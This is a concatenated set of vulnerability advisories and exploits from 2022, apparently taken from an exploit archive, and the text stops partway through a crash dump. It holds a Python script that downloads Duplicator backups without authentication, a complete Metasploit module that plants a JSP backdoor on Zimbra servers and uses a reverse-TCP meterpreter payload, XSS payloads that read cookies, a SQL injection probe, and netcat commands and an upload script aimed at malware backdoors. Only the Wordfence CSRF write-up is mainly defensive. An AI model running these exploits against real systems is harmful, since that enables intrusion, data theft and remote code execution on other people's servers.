<pre><code>## Title: WordPress Plugin Duplicator 1.4.7.1 - Unauthenticated Backup Download<br />## Author: nu11secur1ty<br />## Date: 08.08.2022<br />## Vendor: https://wordpress.org/<br />## Software: https://wordpress.org/plugins/duplicator/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1<br /><br /><br /><br />## Description:<br />The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated<br />Backup Download, after an update from the 1.4.7 version.<br />The attacker can download all archive information from the system by<br />using this vulnerability!<br /><br />Status: CRITICAL<br /><br />[+] Exploit:<br /><br />```python<br />#!/usr/bin/python<br /># Author nu11secur1ty<br />import requests<br />import time<br /><br />vulnerableURL = "http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"<br />archive=input("Give the name of the archive...\n")<br />response = requests.get(vulnerableURL)<br />time.sleep(5)<br />open(archive, "wb").write(response.content)<br />print("Right now, you just downloaded the secret archive =)\n")<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ee11bg)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Nortek Linear eMerge E3-Series - Account Take Over<br /># Exploit Author: Omar Hashim<br /># Version: 0.32-07p<br /># Vendor home page: https://www.nortekcontrol.com/access-control/<br /># Vendor home page: https://linear-solutions.com/<br /># Authentication Required: No<br /># CVE: CVE-2022-31798<br /><br /># Description<br /> ====================<br />There is local session fixation that chained with reflected cross-site<br />scripting leads to account take over of admin or less privileged users<br /><br /># Proof Of Concept:<br /> ====================<br />http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<img<br />src=x onerror=alert(document.location)><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Format::RarSymlinkPathTraversal<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',<br /> 'Description' => %q{<br /> This module creates a RAR file that can be emailed to a Zimbra server<br /> to exploit CVE-2022-30333. If successful, it plants a JSP-based<br /> backdoor in the public web directory, then executes that backdoor.<br /><br /> The core vulnerability is a path-traversal issue in unRAR that can<br /> extract an arbitrary file to an arbitrary location on a Linux system.<br /><br /> This issue is exploitable on the following versions of Zimbra, provided<br /> UnRAR version 6.11 or earlier is installed:<br /><br /> * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)<br /> * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)<br /> },<br /> 'Author' => [<br /> 'Simon Scannell', # Discovery / initial disclosure (via Sonar)<br /> 'Ron Bowes', # Analysis, PoC, and module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-30333'],<br /> ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],<br /> ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],<br /> ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],<br /> ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],<br /> ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],<br /> ],<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [ 'Zimbra Collaboration Suite', {} ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',<br /> 'TARGET_FILENAME' => nil,<br /> 'DisablePayloadHandler' => false,<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Stance' => Msf::Exploit::Stance::Passive,<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-06-28',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),<br /><br /> # Separating the path, filename, and extension allows us to randomize the filename<br /> OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),<br /> OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),<br /> OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),<br /><br /> # Took this from multi/handler<br /> OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),<br /> OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])<br /> ]<br /> )<br /> end<br /><br /> # Generate an on-system filename using datastore options<br /> def generate_target_filename<br /> if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')<br /> print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')<br /> end<br /><br /> File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")<br /> end<br /><br /> # Normalize the path traversal and figure out where it is relative to the web root<br /> def zimbra_get_public_path(target_filename)<br /> # Normalize the path<br /> normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath<br /><br /> # Figure out where it is, relative to the webroot<br /> webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')<br /> relative_path = normalized_path.relative_path_from(webroot)<br /><br /> # Hopefully, we found a path from the webroot to the payload!<br /> if relative_path.to_s.start_with?('../')<br /> return nil<br /> end<br /><br /> relative_path<br /> end<br /><br /> def exploit<br /> print_status('Encoding the payload as a .jsp file')<br /> payload = Msf::Util::EXE.to_jsp(generate_payload_exe)<br /><br /> # Create a file<br /> target_filename = generate_target_filename<br /> print_status("Target filename: #{target_filename}")<br /><br /> begin<br /> rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)<br /> rescue StandardError => e<br /> fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")<br /> end<br /><br /> file_create(rar)<br /><br /> print_good('File created! Email the file above to any user on the target Zimbra server')<br /><br /> # Bail if they don't want the payload triggered<br /> return unless datastore['TRIGGER_PAYLOAD']<br /><br /> # Get the public path for triggering the vulnerability, terminate if we<br /> # can't figure it out<br /> public_filename = zimbra_get_public_path(target_filename)<br /> if public_filename.nil?<br /> print_warning('Could not determine the public web path, disabling payload triggering')<br /> return<br /> end<br /><br /> register_file_for_cleanup(target_filename)<br /><br /> interval = datastore['CheckInterval'].to_i<br /> print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")<br /><br /> # This loop is mostly from `multi/handler`<br /> stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i<br /> timeout = datastore['ListenerTimeout'].to_i<br /> loop do<br /> break if session_created?<br /> break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(public_filename)<br /> )<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')<br /> end<br /><br /> Rex::ThreadSafe.sleep(interval)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Description: Cross-Site Request Forgery to Settings/Options Update<br /><br />Affected Plugin: Ecwid Ecommerce Shopping Cart<br /><br />Plugin Slug: ecwid-shopping-cart<br /><br />Affected Versions: <= 6.10.23<br /><br />CVE ID: CVE-2022-2432<br /><br />CVSS Score: 8.8 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Marco Wotschka<br /><br />Fully Patched Version: 6.10.24<br /><br />Ecwid Ecommerce Shopping Cart is a plugin offered by Lightspeed that allows site owners to set up an eCommerce store on a WordPress website and then sync it across various services such as Amazon and social media. It also offers ad integration and access to marketing tools. As part of the plugin’s functionality, there were some more advanced settings that could be managed. Unfortunately, this was implemented insecurely making it possible for attackers to update these settings via a forged request.<br /><br />More specifically, the plugin provides the following admin_post action hooked to the ‘ecwid_update_plugin_params‘ function for that purpose:<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgGRrW4wJp7s4LR8_8W5GZxc55cBM_qW8hSV9n7QFM8MW16sCxG5h4mMrW8RWrLm7fnSqrW70Vz_q4PPYx1W6cGQ985xBh94W4KV7Yy3dzXV8W8bTSFR1sB2J5N60tSb8sMfWmW3Qhxq480ZZDvW6qNFsM4YqZm2W47Fl6f537-gRW8G9Mq25QpGZZW2B_hWM7ZNSZrW8jJ9gf8MSG0pW3c2FG27vDxqyW24KmsZ1HxD3TW6BS5rM4h9TL_W4My4sZ2R5dngW7nrf8C81zMWXW1bBRCq4lYLdfW5Wd9gF2rjpt7W2b9RlV7CGYQ8W4sgGCX98nMgqW1FPwLN10ndByW6yw5YW7rm4RLW1l8_qC5kZvHYW5kyvmH8qjwnbW6cS_Sd2f9WPjM-RF9H50XrYW6d-cP13xx9gWW8Jr_cw26btsNW30S0Xr6gZ41G36ft1 )<br /><br />An initial check in the ‘ecwid_update_plugin_params‘ function ensures that the current user is allowed to manage site options, which is a capability that belongs to administrators. However, the nonce check performed shortly after is only executed if a nonce is set due to how the function uses && to combine the checks to validate that a nonce is present in the request and to verify that the nonce is valid. This means that if the wp-nonce parameter is not supplied in the request, the verification step is skipped. This makes the functionality susceptible to Cross-Site Request Forgery attacks in vulnerable versions.<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgK04W67C43l5f9PlsW1vTzZ291zXDyW7lwxqt5S_SqhW8qMCLs5Vs8hTMlVtTSW5m53W8jPcbS3cs9wpW6xWDF_2xbLMZN7RfvGrn4vjHVXqXzJ3XzQ-1W3SsZJk5qWZY5W7tNvtn7z-pFSW2T45NG8qgmVjW4mZN5T8CCQR4W4X-xkp3MRyMBW8bQV2l1QmfF2W1N6yKt2SKNJxV9hRB01Dr8M4N4LKmRgHfRR-N5f00LN8JsxlVQCRGg9b5QQgVm1Wrc2NkSRpN22l9qWLg4rRW20bJdN7F1XgdN36zDyK1TZzNW6Fk9mV1Y1vkJW7zJyHY4w7XrNW6YPJyL4yxX2PW6qVHnh960fF3W8yZq6C8Nfqr_VkfJpP34G9dBW7J4NVS8plYskN1tn7-6tGsPRW3vNTQ14zxQXMW2gFKwm8yhK853nT51 )<br /><br />This makes it possible for an attacker to change the ecwid_store_id, which uniquely identifies the store and is needed for support requests as well as for embedding the store on other sites. Another site option that could be modified is the site’s ecwid_store_page_id, which is the storefront page in the WordPress installation. Both of these settings may result in a loss of availability of the storefront if changed to an invalid store ID. There are several other settings that could be affected in addition to those two. The plugin does not provide a direct link to the settings page in any of its menus and a warning on the page suggests that modifying these settings may significantly affect the plugin functionality.<br /><br />The Importance of Properly Implementing Nonces<br /><br />Nonces are a critical component used to prevent Cross-Site Request Forgery vulnerabilities. As such, it’s important to ensure they are properly implemented throughout plugin and theme code to prevent unauthorized execution of that code. Fortunately, WordPress provides several mechanisms to create and validate proper nonces.<br /><br />Nonce Creation<br /><br />The first step to proper nonce implementation is nonce creation.<br /><br />One option to properly implement nonce creation involves the wp_nonce_url() function. This function expects a target URL as well as an action and an optional nonce name. The nonce will be added to a URL and can be verified by a nonce validation function that is executed in the same or subsequent function. This makes it possible for developers to provide links to perform actions such as deletion of posts with a proper nonce that allows the code to verify that the action was initiated from within the site as opposed to a click on a link elsewhere, such as in an email.<br /><br />An additional option is adding a nonce to a form to secure any submissions originating from that form. The function wp_nonce_field() is frequently used in these cases and expects an action string. This will add a hidden input field to the form. Upon form submission, the created nonce can be checked and verified.<br /><br />Finally, a nonce can also be generated using wp_create_nonce(), which accepts an action string argument and returns just a nonce. This can be implemented in a variety of different ways and allows more flexibility as a developer to implement nonce validation. We frequently see this function contained in HTML on setting pages that is later used to validate the origin of the request when saving those settings.<br /><br />Remember that nonces are specific to individual users and sessions and are invalidated after 24 hours, or on logout.<br /><br />Nonce Validation<br /><br />The second step to proper nonce implementation involves nonce verification. A plugin can implement an appropriate nonce on a form or settings update, but without proper validation of that nonce, there won’t be adequate protection.<br /><br />The first option to properly validate a nonce involves the use of the check_admin_referer() function. This function accepts the protected action as well as the name of the nonce as an argument and checks the nonce as well as the referer, thus helping to ensure that the nonce provided is correct and that the request was initiated from an admin page.<br /><br />When implementing an AJAX action, the check_ajax_referer() function can be used. This will verify the nonce but will not check the referer like the check_admin_referer() function does although it will validate that the request is an AJAX request.<br /><br />A final option for validating a nonce is the more general wp_verify_nonce() function. With this function, an action and nonce name will need to be supplied, and it will verify that the proper nonce was set. This provides the most flexible implementation of nonce validation for developers.<br /><br />In the case of today’s disclosure, the nonce was created on the settings form itself with wp_create_nonce():<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgF42W98C5CQ5NDR3nN58bq_96Ch4zW3GRvs_6bwRX5W3tsvrb2ShCghW3x06W68pRQH9W3Dg71b6v1HrYN1qR5fbY2lRlW1k5j_14xFFJHW7X-WLl1rqWk4W2Xtb8w2ZQV1fW60H5QG1l9dtQW4FrrX83gDD31W6PL9cT6F_6LvW370m6b2hcXrhW87SST67k_CFgW5-p6J61CRPtqW41Q3yy1ZncNXW3tf7LN7M0RtnVB_kYq1ywQZZW5nCmTg91v6g7W7d0m-m6FkNhhW7ZJZnp8SNnfqW8slWGB5dKbwfW6hRPqV27VwPwN6VYg76H73KcW5RSHN32P4qKzW87nrK28tmgf3W9kClqb5c9kpxW4sNhxd6ZtC1NW4W6S6N4tX1hSW8VG37Z822PTvW3vQSg86XJbffMW8y1Kj7SkzW8qWmSB1p6tWz33Jt1 )<br /><br />As you can see, this statement will call wp_verify_nonce() but only if the nonce is set due to the if (isset($_POST['wp-nonce']) check and the use of && in combination with the wp_verify_nonce() function. Therefore, if the nonce is omitted, this check will not take place.<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgYDJW4r9V7C4zvxxJW8nbMdr8F-cRDW2rwyLJ1CP2WHW4J-5Pl31WzP1W6DVyjb8Z3jqdN4stQLdG_ZkNW4mglnq1G8sRNW5mXcDc3VtGGNW4FY3bS3VJv8bW81wTgx9bFbTPV1C4Hj2mqjn2W34wsp890BqJ4W3mYsyR7j1ZmkW3N5y145YdY3JW1y9Jw7794yXvN8-B_JcFVNZ3W7qmWfy4_SYqlW8phV2n20Y2n1VY28TM2d1DnBVmThSG3kLmm9W3w1Qb8274pyfW3DMgQT1d69drW1Z_vwR8tNJ00W5VhJ9W1WWjw5V21_7j12XCNfW4nmmL65HjtPhW6bzWt73Vyc5XW49_SzN8D05kRW1p_M0l1RcrzgN5kXSx6thPmgW6kq5wb8y9lv7W2wb9d72F0qKFW6RJdQV89RNSpN1_lhTsk65Q51P1 )<br /><br />This serves as an important reminder to not only properly implement nonces and validation checks but also to ensure that the check fails when the nonce value is empty or otherwise not present.<br /><br />As a final important note: never rely on nonce checks alone. Developers should always remember to include a capability check using a function like current_user_can() in order to ensure the user initiating the action is indeed allowed to perform it. Nonces should never be used for authentication, authorization or any form of access control as they are simply intended to verify the origin of the request, and do not perform any authorization.<br /><br />Timeline<br /><br />June 24, 2022 – Initial outreach to the plugin developer.<br /><br />July 11, 2022 – We escalate the issue to the WordPress.org plugins team and send them the full disclosure details.<br /><br />July 13, 2022 – The vulnerability is patched in version 6.10.24.<br /><br />Conclusion<br /><br />In today’s post, we covered a vulnerability in the Ecwid Ecommerce Shopping Cart plugin that could be used to trick site administrators into updating plugin settings due to improper nonce verification. The vulnerability was patched by ensuring that a proper nonce was set and by verifying it.<br /><br />Please remember that due to the nature of Cross-Site Request Forgery vulnerabilities, it is not possible to provide adequate protection via the Wordfence firewall without blocking legitimate requests. As such, we highly recommend updating to version 6.10.24 or higher of Ecwid Ecommerce Shopping Cart to ensure that your site is protected against any exploits targeting this vulnerability.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.<br /><br />If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Ecwid Ecommerce Shopping Cart as soon as possible.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/76c09bc82984c7f7ef55eb13018e0d87_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Bushtrommel.122<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 31745 and 1030. Adversaries who can reach infected hosts can run commands made available by the backdoor. The "*RUN" command calls CreateProcess() based on CL input, errors will result in a pop up dialog on the infected host: "CreateProcess() in function () GetConsoleOuput() failed!". Correct syntax is as follows *RUN"calc.exe", successful code execution results in the response "*EVA*" from the backdoored host.<br />Family: Bushtrommel<br />Type: PE32<br />MD5: 76c09bc82984c7f7ef55eb13018e0d87<br />Vuln ID: MVID-2022-0630<br />Disclosure: 08/04/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 31745<br />*PASS**RUN"calc.exe"<br />*EVA*<br /><br />C:\>nc64.exe x.x.x.x 31745<br />*PASS**RUN"c:\DOOM.exe"<br />*EVA*<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/76c09bc82984c7f7ef55eb13018e0d87.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Bushtrommel.122<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 31745 runs an ftp server on port 1030. Attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.<br />Family: Bushtrommel<br />Type: PE32<br />MD5: 76c09bc82984c7f7ef55eb13018e0d87<br />Vuln ID: MVID-2022-0629<br />Disclosure: 08/04/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 1030<br />220 ICS FTP Server ready.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,236,165).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />426 Connection closed; Datei C:\TEMP\DOOM.exe kann nicht erstellt werden.<br />CDUP \<br />250 CWD command successful. "C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,236,172).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />226 File received ok<br /><br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=60588<br />DOOM="DOOM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: online-admission-system 1.0 - unauthenticated SQL Injection<br /># Date: 5-08-2022<br /># Exploit Author: syad<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html<br /># Version: 1.0<br /># Tested on: Windows 10 + XAMPP 3.2.4<br /># CVE ID : N/A<br /><br /># Description <br /># The eid parameter does not perform input validation on the edit.php file it allow unauthenticated SQL Injection<br /><br /><br />import requests<br />import sys<br /><br />proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}<br /><br />def send_request(ip):<br /> x = "http://%s/Student-Admission_0/Student-Admission/?a=edit&eid=8'" %ip<br /> z = requests.get(x,proxies=proxies)<br /> if "You have an error in your SQL syntax" in z.text:<br /> print("[+] Found Sql Injection")<br /> <br /><br />if __name__ == "__main__":<br /> try:<br /> ip = sys.argv[1].strip()<br /> <br /> except IndexError:<br /> print("[-] Usage %s <ip>" % sys.argv[0])<br /> print("[-] Example: %s 192.168.1.x" % sys.argv[0])<br /> sys.exit(-1)<br /><br />send_request(ip)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Stored XSS in post_title parameter in WordPress Plugin "Testimonial Slider and Showcase" 2.2.6<br /># Date: 05/08/2022<br /># Exploit Author: saitamang , yunaranyancat , amd_syad<br /># Vendor Homepage: wordpress<br /># Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/<br /># Version: 2.2.6<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.<br /><br />Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post<br /><br />payload --> test"/><img/src=""/onerror=alert(document.cookie)><br /><br />The draft post can be viewed using Admin account and XSS will be triggered.<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/783a191e7944e1af84ec0fa96d933f30.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Jokerdoor<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: The malware listens on TCP port 27374. Attackers who can reach an infected system can send a large payload and trigger a classic stack buffer overflow overwriting the ECX, EIP registers and structured exception handler (SEH). When connecting you will get a "connected" server response, then we supply our payload as a parameter prefixed by "DOS".<br />Family: Jokerdoor<br />Type: PE32<br />MD5: 783a191e7944e1af84ec0fa96d933f30<br />Vuln ID: MVID-2022-0628<br />Dropped files: ywwqlwntubs.exe (random names)<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 08/03/2022<br /><br />Memory Dump:<br />(21f0.2268): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=000a1600 ebp=000a1620 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:000> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=000a1600 ebp=000a1620 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for ywwqlwntubs.exe<br />*** ERROR: Module load completed but symbols could not be loaded for ywwqlwntubs.exe<br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br />+26<br />41414141 ?? ???<br /><br />EXCEPTION_RECORD: 0019ee34 -- (.exr 0x19ee34)<br />ExceptionAddress: 41414141<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: ywwqlwntubs.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000008<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />+26<br />41414141 ?? ???<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+26<br />41414141 ?? ???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />IP_ON_HEAP: 41414141<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />CONTEXT: 0019ee84 -- (.cxr 0x19ee84)<br />eax=00010000 ebx=04223c0c ecx=749feb0d edx=00000000 esi=010b0844 edi=02860d24<br />eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />41414141 ?? ???<br />Resetting default scope<br /><br />ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 41414141<br /><br />FAULTING_THREAD: ffffffff<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE<br /><br />PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_STACKIMMUNE<br /><br />DEFAULT_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />00000000 00000000 ywwqlwntubs.exe+0x0<br /><br /><br />STACK_COMMAND: .cxr 000000000019EE84 ; kb ; ** Pseudo Context ** ; kb<br /><br />SYMBOL_NAME: ywwqlwntubs.exe<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: ywwqlwntubs<br /><br />IMAGE_NAME: ywwqlwntubs.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19<br /><br />FAILURE_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE_c0000005_ywwqlwntubs.exe!Unknown<br /><br />BUCKET_ID: 